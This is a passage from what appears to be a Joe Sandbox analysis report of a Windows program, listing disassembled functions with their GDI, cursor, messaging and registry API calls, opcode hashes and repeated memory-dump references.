                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClosePrivateProfileStringValueWritewsprintf
                                    • String ID:
                                    • API String ID: 1902064621-0
                                    • Opcode ID: f822efc57f119980b54195db91f83eced589589e2e7fa163ecbbcb2aee5faef4
                                    • Instruction ID: 0e6db0881935dd224baa13d775f8efbdf1714d7deb8968fc9dc763a79b8d7058
                                    • Opcode Fuzzy Hash: f822efc57f119980b54195db91f83eced589589e2e7fa163ecbbcb2aee5faef4
                                    • Instruction Fuzzy Hash: AC01A236900615BBCB515F68DC09FEA7BA8FF84714F05443ABE1196060E774D5219B98
                                    Function 004C2DAA Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowExtEx.GDI32(?,00441DAA,00000000,?,?,00000000,00441DAA,?,?,00000000,?,000000FF,00443CA9,?,00000000,?), ref: 004C2DBB
                                    • GetViewportExtEx.GDI32(?,?,?,?,00000000,00441DAA,?,?,00000000,?,000000FF,00443CA9,?,00000000,?,?), ref: 004C2DC8
                                    • MulDiv.KERNEL32(00441DAA,00000000,00000000), ref: 004C2DED
                                    • MulDiv.KERNEL32(0C244C8D,00000000,00000000), ref: 004C2E08
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ViewportWindow
                                    • String ID:
                                    • API String ID: 1589084482-0
                                    • Opcode ID: bfc08c58b42ce3829b2610a68ada3a965c6229fd7f4e2c4d9f7f45e375d1f74f
                                    • Instruction ID: b3765eb2fc1337b0d938c253478f28a31907a513c084715245822d1c3ce8e3aa
                                    • Opcode Fuzzy Hash: bfc08c58b42ce3829b2610a68ada3a965c6229fd7f4e2c4d9f7f45e375d1f74f
                                    • Instruction Fuzzy Hash: FEF01972800118FFEB116B66DD0ACBEBBBDEF50714B10443EF85192170EB756E519B54
                                    Function 0041DC10 Relevance: 6.0, APIs: 4, Instructions: 35registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,00000000,00000000), ref: 0041DC2A
                                    • RegQueryValueA.ADVAPI32 ref: 0041DC4E
                                    • lstrcpy.KERNEL32(?,00000000), ref: 0041DC61
                                    • RegCloseKey.ADVAPI32(?), ref: 0041DC6C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValuelstrcpy
                                    • String ID:
                                    • API String ID: 534897748-0
                                    • Opcode ID: 387668aa539149f81a58d86519821bf266b3a325d45d207e06df99955fa81219
                                    • Instruction ID: 5a41a924eaafdc77402ae56f8f830a1e4b052feb2dfcee390b7be0bf1a17819d
                                    • Opcode Fuzzy Hash: 387668aa539149f81a58d86519821bf266b3a325d45d207e06df99955fa81219
                                    • Instruction Fuzzy Hash: ECF04FB9504301BFD320DB14DC88EABBBA8FBC4754F00892CF98882250E670E845CBE2
                                    Function 0042C0D0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 291COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: <
                                    • API String ID: 0-4251816714
                                    • Opcode ID: 7307476828a1f867869add80bc2ced435850eeba50882984640bd88944948299
                                    • Instruction ID: b1e7bab281e4aaf7d00eee967deb939ab4fe19a4158f1f9572939c5571e3108f
                                    • Opcode Fuzzy Hash: 7307476828a1f867869add80bc2ced435850eeba50882984640bd88944948299
                                    • Instruction Fuzzy Hash: 9EB1C6716087518BC324DF28D890A6FB7E1BFC5714F648A2EF896D7340DB34D9098B56
                                    Function 004AA282 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 004AA312
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: 3bb39e229cdeab26f71b3dd31d714e0d7e0e203ef363955f9717881901447778
                                    • Instruction ID: 9ca4fced2e17d248d7986c3c317e1751ba1f9630cd047b99a970948bc96e28db
                                    • Opcode Fuzzy Hash: 3bb39e229cdeab26f71b3dd31d714e0d7e0e203ef363955f9717881901447778
                                    • Instruction Fuzzy Hash: 76513B2190820186CF197718C9093FF37949B66751F20899FE89681399EB2DCCEDDB6F
                                    Function 0043EB60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: e5c89328fac4d1e9998f4b486f9f3f39ba505947fd3d4c9c936d5a8761bff58f
                                    • Instruction ID: 113d23fbe258d7a352a55eea137ca4b9a81f9009bc6843a7b686b1001ec636d0
                                    • Opcode Fuzzy Hash: e5c89328fac4d1e9998f4b486f9f3f39ba505947fd3d4c9c936d5a8761bff58f
                                    • Instruction Fuzzy Hash: 47517F712053419BD314DF16C891AAFB7A4FB89318F00162EF942833D1D739E946CB9A
                                    Function 0041C660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0041C78A
                                    • SendMessageA.USER32(?,00000402,?,00000000), ref: 0041C7B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_progress32
                                    • API String ID: 3850602802-3107856198
                                    • Opcode ID: a8586357c7d218e16205129112c8e4767d93b408b925cbbb6e874a0220b3c6c8
                                    • Instruction ID: 7c4fe347a6cc56f6d0789f07f74cf866e0ee86d6730dd7a1926425c036ff034b
                                    • Opcode Fuzzy Hash: a8586357c7d218e16205129112c8e4767d93b408b925cbbb6e874a0220b3c6c8
                                    • Instruction Fuzzy Hash: 4C418E72354B119BE328CA19CC81F6BB3E6EBC8B14F14892EF646C7780D679EC418B55
                                    Function 0043E8F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: 4efa564978a40623f040414e2ad8eb5c97866d94ef5968e1f122cc4228ab0771
                                    • Instruction ID: 3abac848f70641818e9afec5e7a128d8e54431c441953fbb78636d00104a06d7
                                    • Opcode Fuzzy Hash: 4efa564978a40623f040414e2ad8eb5c97866d94ef5968e1f122cc4228ab0771
                                    • Instruction Fuzzy Hash: 563178B12083419FC754DF25C954BABB7F4FF88724F004A2EF89683290D778A945CB5A
                                    Function 00417DD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStockObject.GDI32(00000005), ref: 00417EA1
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00417EAF
                                      • Part of subcall function 004343B0: GetClassInfoA.USER32(?,?,?), ref: 004343C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClassCursorInfoLoadObjectStock
                                    • String ID: _EL_Label
                                    • API String ID: 1762135420-1571322718
                                    • Opcode ID: fe832d07d867716caea26dd5c9d7337806877a0442c4243bad03f432bc539ba1
                                    • Instruction ID: 96b03d267a2899fdce80f712d500971b411e6a873caa640200395a490e6f6712
                                    • Opcode Fuzzy Hash: fe832d07d867716caea26dd5c9d7337806877a0442c4243bad03f432bc539ba1
                                    • Instruction Fuzzy Hash: 10317EB1608700AFD214DB59CD42F6BB7F5EB88B00F004A1EF55A97390D775AC01CBAA
                                    Function 0041EFF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0043A960: DeleteObject.GDI32(?), ref: 0043A974
                                    • DestroyCursor.USER32(?), ref: 0041F054
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDeleteDestroyObject
                                    • String ID: ,WL$pTL
                                    • API String ID: 1476932828-3286615107
                                    • Opcode ID: 601ebee34ae3936179f86c7e25e8d453a702ae3f0b58bb3b5bce9165ecf9c162
                                    • Instruction ID: abcd142ad71d57c67957d5775debc069e4b66dc8a50ae2204fa151b66210daaf
                                    • Opcode Fuzzy Hash: 601ebee34ae3936179f86c7e25e8d453a702ae3f0b58bb3b5bce9165ecf9c162
                                    • Instruction Fuzzy Hash: 5C317C74504B42CFD314DF66C490B9AFBE0BF55318F44892EE4AA83741C778A609CFAA
                                    Function 00425DA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 00425DFA
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • FillRect.USER32(?,?,00000000), ref: 00425E27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologRect$BeginBrushClipCreateEmptyFillPaintSolid
                                    • String ID: pTL
                                    • API String ID: 3827101677-168633513
                                    • Opcode ID: 849d6c0ec3e37bd620472d06f30bd6771b329386ef28d82e360d7396f153af31
                                    • Instruction ID: 24259b843354b992461d49e6a8d7c46249c3ecd264c40818019f0c1e8d2d94c7
                                    • Opcode Fuzzy Hash: 849d6c0ec3e37bd620472d06f30bd6771b329386ef28d82e360d7396f153af31
                                    • Instruction Fuzzy Hash: B431AF752087509FD314EF20C991FABB7E4BF88708F50891EF5A643291DBB8DA04CB66
                                    Function 0041BF20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0043A960: DeleteObject.GDI32(?), ref: 0043A974
                                    • DestroyCursor.USER32(?), ref: 0041BF7E
                                    Strings
                                    Memory Dump Source
